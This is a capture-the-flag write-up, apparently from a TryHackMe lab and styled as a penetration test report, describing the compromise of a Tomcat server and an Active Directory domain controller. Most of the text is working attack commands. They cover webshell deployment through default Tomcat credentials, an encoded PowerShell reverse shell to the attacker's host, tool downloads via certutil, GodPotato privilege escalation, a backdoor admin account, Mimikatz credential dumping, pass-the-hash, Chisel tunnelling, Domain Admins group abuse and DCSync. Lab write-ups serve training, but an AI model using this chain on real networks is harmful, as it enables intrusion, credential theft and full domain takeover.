Scribd
Upload
831 views8 pages

AD Report

Uploaded by

fidaxop276
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
831 views8 pages

AD Report

Uploaded by

fidaxop276
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 8

for your understanding here is the scope:

In-Scope

Assessment Targets:

10.200.150.10 - AD Domain Controller

10.200.150.20 - Standard domain-joined server/workstation

TryBankMe's internal infrastructure includes a newly built Active Directory


(AD) domain that will eventually support internal operations, identity
management, and service authentication across its banking systems. As the
domain is still under development, this assessment serves as an early-stage
configuration review and compromise simulation.

Your goal is to assess whether misconfigurations, insecure permissions, or


poor implementation choices exist that could allow compromise of key AD
assets. Specifically, you will test access to both a standard AD-connected
server and the domain controller.

This early review will help the TryBankMe team address weaknesses before
expanding production infrastructure.

Attack Path to Compromise the Workstation (10.200.150.20)

Phase 1: Service Discovery and Vulnerability Identification

The attack began with comprehensive network scanning of the target


workstation at 10.200.150.20 using Nmap with aggressive timing parameters
(-T4) and host discovery disabled (-Pn).

nmap -p- --open 10.200.150.20 -vv -T4 -Pn


This revealed four critical open ports:

Port 445 (SMB): Potential lateral movement pathway

Port 3389 (RDP): Graphical remote access interface

Port 5985 (WinRM): Windows Remote Management service

Port 8080 (HTTP): Apache Tomcat service

Manual inspection of the Tomcat service


at http://10.200.150.20:8080 revealed the Manager application interface
at /manager/html. This interface required authentication, and testing of
default credentials (tomcat:s3cret) successfully granted access to the
application deployment dashboard.

Phase 2: Malicious Payload Deployment

Using publicly available webshell resources, the attacker downloaded a JSP


command execution script (cmd.jsp) from a GitHub repository. This script was
packaged into a WAR archive named backup.war using the ZIP utility to
camouflage it as a legitimate backup file.

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-
webshell/jsp/cmd.jsp

zip -r backup.war cmd.jsp

The malicious archive was uploaded through Tomcat Manager's deployment


interface, which automatically extracted it to the web directory
at /webapps/backup/.

The webshell was then accessed at:

http://10.200.150.20:8080/backup/cmd.jsp?cmd=whoami

which confirming execution context as nt authority\local service , a


privileged service account with SeImpersonatePrivilege enabled. This
vulnerability existed due to Tomcat running with excessive privileges rather
than a dedicated service account.

Phase 3: Reverse Shell Establishment

The attacker initiated a Netcat listener on port 5555:

rlwrap -f . -r nc -nvlp 5555

A Base64-encoded PowerShell reverse shell payload was generated targeting


the attacker's machine (10.250.1.6:5555) and executed through the
webshell:

powershell -e
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB
5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABD
AGwAaQBlAG4AdAAoACIAMQAwAC4AMgA1ADAALgAxAC4ANgAiACwANQA1A
DUANQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4
ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAY
gB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AO
wB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUg
BlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAu
AEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0A
GEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4A
YQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQ
BuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB
5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawA
gAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPA
HUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAI
AA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgAC
gAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZ
ABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbg
BnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABz
AGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQA
ZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABl
AC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzA
GgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

This established a persistent reverse shell connection, providing interactive


command-line access as nt authority\local service. Host enumeration
revealed the flag at C:\flag.txt containing

THM{ac0c3f6b-f95a-4e0c-b7a9-6b8408d5be4c}.

Attack Path to Compromise the Domain Controller (10.200.150.10)

Step 1: Initial Access via Workstation (10.200.150.20)

1.1. Reverse Shell Exploitation:

Gained initial access to the workstation (10.200.150.20) via a reverse shell


on Apache Tomcat, running as nt authority\local
service with SeImpersonatePrivilege enabled.

1.2. Privilege Escalation:

Downloaded exploit tools from the attacker's Kali machine (10.250.1.6:8001):

certutil -urlcache -f http://10.250.1.6:8001/Godpotato-Net4.exe C:\tomcat\


apache-tomcat-8.5.50\temp\Godpotato-Net4.exe

Executed GodPotato-NET4.exe to abuse

SeImpersonatePrivilege and gain SYSTEM privileges:

GodPotato-NET4.exe -cmd "cmd.exe /c net user mulware password123! /add


&& net localgroup Administrators mulware /add"

Created a local admin user mulware with password

password123!.
1.3. RDP Access:

Connected to the workstation via RDP:

xfreerdp3 /v:10.200.150.20 /u:mulware /p:'password123!' /workarea /smart-


sizing /cert:ignore

Step 2: Credential Theft & Lateral Movement

2.1. Mimikatz for Hash Extraction

Downloaded Mimikatz and extract it on workstation:

certutil -urlcache -f http://10.250.1.6:8001/mimikatz_trunk.zip C:\tomcat\


apache-tomcat-8.5.50\temp\mimikatz_trunk.zip

Expand-Archive -Path "C:\tomcat\apache-tomcat-8.5.50\temp\


mimikatz_trunk.zip" -DestinationPath "C:\tomcat\apache-tomcat-8.5.50\temp\
mimikatz" -Force

Executed Mimikatz as Administrator to dump credentials:

privilege::debug

sekurlsa::logonpasswords

Extracted NTLM hash for svc.callback:

66338f1647cc6a33fd686cd20e7bb917

2.2. Pass-the-Hash to Reauthenticate:

Used svc.callback's hash to gain a shell on the workstation:


impacket-psexec -hashes
aad3b435b51404eeaad3b435b51404ee:66338f1647cc6a33fd686cd20e7bb9
17 svc.callback@10.200.150.20

Step 3: Tunneling to Domain Controller (10.200.150.10)

Chisel Tunnel Setup:

Started Chisel server on Kali:

chisel server --reverse --port 9001

Executed Chisel client on the workstation:

chisel.exe client 10.250.1.6:9001 R:socks

Configured proxychains on Kali add the bellow line in /etc/proxychains.conf:

socks5 127.0.0.1 1080

Step 4: Domain Reconnaissance & Privilege Escalation

4.1. SharpHound for AD Enumeration:

Downloaded SharpHound:

certutil -urlcache -f http://10.250.1.6:8001/sharphound.exe C:\tomcat\


apache-tomcat-8.5.50\temp\sharp.exe

Executed data collection:

.\sharp.exe --collectionmethods All


Analyzed results in BloodHound, revealing svc.callback

had GenericWrite over a group nested under Domain Admins.

4.2. Adding to Domain Admins:

Added svc.callback to the Domain Admins group using pth-net over


proxychains:

proxychains4 pth-net rpc group addmem "Domain Admins" "svc.callback" -U


"tryhackme.loc"/"svc.callback"%"aad3b435b51404ee:66338f1647cc6a33fd6
86cd20e7bb917" -S dc.tryhackme.loc

Step 5: Compromising the Domain Controller

5.1. DCSync Attack:

Dumped domain hashes via proxychains:

proxychains4 impacket-secretsdump
"tryhackme.loc"/svc.callback@10.200.150.10 \

-hashes aad3b435b51404ee:66338f1647cc6a33fd686cd20e7bb917 \

-just-dc

we got Administrator Hash:

89514fef98d0721a55fe9064557f3fe8.

5.2. Gaining DC Shell:

Used the Administrator hash to access the DC:


proxychains4 impacket-psexec administrator@10.200.150.10 -
hashes :89514fef98d0721a55fe9064557f3fe8

5.3 Flag Extraction:

Navigated to C:\ and read flag.txt:

cd C:\

type flag.txt

Flag Captured: THM{189e5434-3213-4271-854b-63e4e4168ed7}.

You might also like